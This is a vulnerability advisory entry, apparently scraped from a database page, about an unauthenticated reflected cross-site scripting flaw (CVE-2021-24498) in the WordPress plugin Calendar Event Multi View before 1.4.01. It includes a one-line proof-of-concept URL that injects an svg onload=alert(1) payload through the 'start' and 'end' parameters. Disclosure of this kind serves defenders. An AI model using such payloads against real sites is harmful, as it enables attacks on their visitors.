Lucene search
IohexWPVDB-ID:3C5A5187-42B3-4F88-9B0E-4FDFA1C39E86HistoryJul 05, 2021 - 12:00 a.m.
Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-07-0500:00:00
iohex
wpscan.com
4
0.002 Low
EPSS
Percentile
54.3%
The plugin does not sanitise or escape the ‘start’ and ‘end’ GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
PoC
https://www.example.com/?cpmvc_id=1&cpmvc;_do_action=mvparse&f;=edit&month;_index=0&delete;=1&palette;=0&paletteDefault;=F00&calid;=1&id;=999&start;=a"><svg/><" &end;=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22
| CPE | Name | Operator | Version |
|---|---|---|---|
| cp-multi-view-calendar | lt | 1.4.01 |
Related
cve
cve
CVE-2021-24498
2021-08-02 11:15:11
cvelist
cvelist
nuclei
nuclei
WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
2021-07-19 05:10:50
prion
prion
Cross site scripting
2021-08-02 11:15:00
nvd
nvd
CVE-2021-24498
2021-08-02 11:15:11
wpexploit
wpexploit